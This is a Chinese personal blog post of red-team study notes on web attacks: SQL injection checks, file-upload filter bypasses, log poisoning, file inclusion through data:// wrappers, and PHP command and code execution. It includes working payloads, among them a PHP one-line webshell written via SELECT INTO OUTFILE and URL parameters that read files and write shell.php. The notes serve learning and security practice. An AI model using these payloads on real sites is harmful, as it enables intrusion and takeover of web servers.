<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.18.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="表单get,post注入 字符型注入     字符型注入类型     ![fajf](sql)     判断是字符型注入还是数值型注入         ?id&#x3D;1&#39; 如果是字符型,不会报错,如果是数字型则报错,下列是报错         and结果为假不出结果,数值字符型报错不出结果">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="http://example.com/2020/09/21/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="表单get,post注入 字符型注入     字符型注入类型     ![fajf](sql)     判断是字符型注入还是数值型注入         ?id&#x3D;1&#39; 如果是字符型,不会报错,如果是数字型则报错,下列是报错         and结果为假不出结果,数值字符型报错不出结果">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-09-21T14:17:49.000Z">
<meta property="article:modified_time" content="2023-09-21T15:25:28.000Z">
<meta property="article:author" content="HWW">
<meta property="article:tag" content="红队">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2020/09/21/sql%E6%B3%A8%E5%85%A5/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2020/09/21/sql%E6%B3%A8%E5%85%A5/","path":"2020/09/21/sql注入/","title":"sql注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sql注入 | Hexo</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Hexo</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Do not go gentle into that good night</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A8%E5%8D%95get-post%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">表单get,post注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">文件注入</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HWW"
      src="/images/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20230921162145.jpg">
  <p class="site-author-name" itemprop="name">HWW</p>
  <div class="site-description" itemprop="description">Do not go gentle into that good night</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/09/21/sql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20230921162145.jpg">
      <meta itemprop="name" content="HWW">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
      <meta itemprop="description" content="Do not go gentle into that good night">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="sql注入 | Hexo">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-09-21 22:17:49" itemprop="dateCreated datePublished" datetime="2020-09-21T22:17:49+08:00">2020-09-21</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-09-21 23:25:28" itemprop="dateModified" datetime="2023-09-21T23:25:28+08:00">2023-09-21</time>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>1.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>3 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="表单get-post注入"><a href="#表单get-post注入" class="headerlink" title="表单get,post注入"></a>表单get,post注入</h1><pre><code> 字符型注入
    字符型注入类型
    ![fajf](sql)
    判断是字符型注入还是数值型注入
        ?id=1&#39; 如果是字符型,不会报错,如果是数字型则报错,下列是报错
        and结果为假不出结果,数值字符型报错不出结果
</code></pre>
<span id="more"></span>
<h1 id="文件注入"><a href="#文件注入" class="headerlink" title="文件注入"></a>文件注入</h1><pre><code>黑名单绕过
    apache的httpd-config的配置文件
    pht

后缀名绕过
    linux服务器对大小写敏感,windows反之
        window特性
            1.php.
            2.php空格
            3.php::$DATA


    .htaccess文件攻击
        SetHandler application/x-httpd-php该文件的代码会覆盖apache的httpd-config的配置文件,并且将内容按照php语法规则解析

    php后缀限制,copy php jpeg 拼接

服务端检测绕过
    MIME类型检测
        image/jepg

    include包含注入
    日志注入 phpstudy/apache/logs/error.log记录报错日志
        浏览器url注入默认编码,会把php代码重新编码,执行不了,
        抓包,可以防止浏览器重新编码,从而php代码被报错日志文件记录

    文件包含注入(include) 
        参数是file1.php文件,说明参数传入到include包含,执行了file1.php代码
        伪协议注入
            php伪协议
            data伪协议,删text, text/plian
            data;&lt;?php system(&quot;dir&quot;);?&gt;
                linux的代码system运行代码tax 解析文件并显示代码,cat 只解析文件
                system(ls )
                system(ls ../)
                system(cat ../key.php)




数据库写码
    https://blog.csdn.net/qq_33942040/article/details/108577874
    两种方式
    一种mysql日志写入
    一种直接写入
    ｜ select &#39;&lt;?php @eval($_POST[w]);?&gt;&#39; into outfile &#39;c:/wamp/www/45.php&#39;

命令执行和代码(远程)执行
    写小马写在网站目录里面,因为有php环境,可以执行php代码
    命令执行漏洞是直接调用操作系统命令，故这里叫作OS命令执行漏洞，
    代码执行漏洞则是靠执行脚本代码调用操作系统命令。
    命令执行：(系统本地命令) windows常见命令
        net user命令是Windows操作系统中的一个命令行工具
        system()       输出并返回最后一行shell结果
        exec()         执行一个外部程序
        shell_exec()   通过shell环境执行命令，并且将完整的输出以字符串的方式返回
        passthru()     执行外部程序并且显示原始输出
        pcntl_exec()   在当前进程空间执行指定程序
        popen()        打开进程文件指针
        proc_open()    执行一个命令，并且打开用来输入/输出的文件指针
        ?a=type 文件名 ; 查看文件内容
        ?a=cd 查看当前目录路径
        ?a=echo&quot;&lt;?php phpinfo.php;?&gt; &quot; &gt; E:\xamapp\.phpinfo(); 写shell
        ?a=dir 

    远程/代码执行：
        eval()            把字符串作为PHP代码执行
        assert()          检查一个断言是否为 FALSE，可用来执行代码
        preg_replace()    执行一个正则表达式的搜索和替换
        call_user_func()  把第一个参数作为回调函数调用
        call_user_func_array() 调用回调函数，并把一个数组参数作为回调函数的参数
        array_map()       为数组的每个元素应用回调函数

    利用远程命令执行代码
        ?a=ls 
        ?a=@eval($_POST[333]) 一句话木马
        ?a=print(_FILE_)获取当前路径(只能用assert接收并执行,用eval执行不了)
        ?a=var_dump(file_get_contents(&#39;路径&#39;));读取文件
        a=var_dump(file_put_contents($_POST[1],$_POST[2]));
            1=shell.php&amp;2=&lt;?php phpinfo();?&gt; 写shell,通过psot传递参数,构造shell.php文件,(在当前路径下)
</code></pre>

    </div>

    
    
    

    <footer class="post-footer"><script src="//sdk.jinrishici.com/v2/browser/jinrishici.js"></script>
<script>
  jinrishici.load((result) => {
    let jrsc = document.getElementById('jrsc');
    const data = result.data;
    let author = data.origin.author;
    let title = '《' + data.origin.title + '》';
    let content = data.content.substr(0, data.content.length - 1);
    let dynasty = data.origin.dynasty.substr(0, data.origin.dynasty.length - 1);
    jrsc.innerText = content + ' @ ' + dynasty + '·' + author + title;
  });
</script>
<div style="text-align: center"><span id="jrsc" >正在加载今日诗词....</span></div>
          <div class="post-tags">
              <a href="/tags/%E7%BA%A2%E9%98%9F/" rel="tag"># 红队</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/09/20/hexo%E5%8D%9A%E5%AE%A2/" rel="prev" title="hexo博客">
                  <i class="fa fa-angle-left"></i> hexo博客
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/10/08/%E8%99%9A%E6%8B%9F%E6%9C%BA%E7%BD%91%E7%BB%9C%E9%97%AE%E9%A2%98/" rel="next" title="kali和centeos网络问题">
                  kali和centeos网络问题 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2020 – 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">HWW</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">40k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:06</span>
  </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/4.0.7/pangu.min.js" integrity="sha256-j+yj56cdEY2CwkVtGyz18fNybFGpMGJ8JxG3GSyO2+I=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
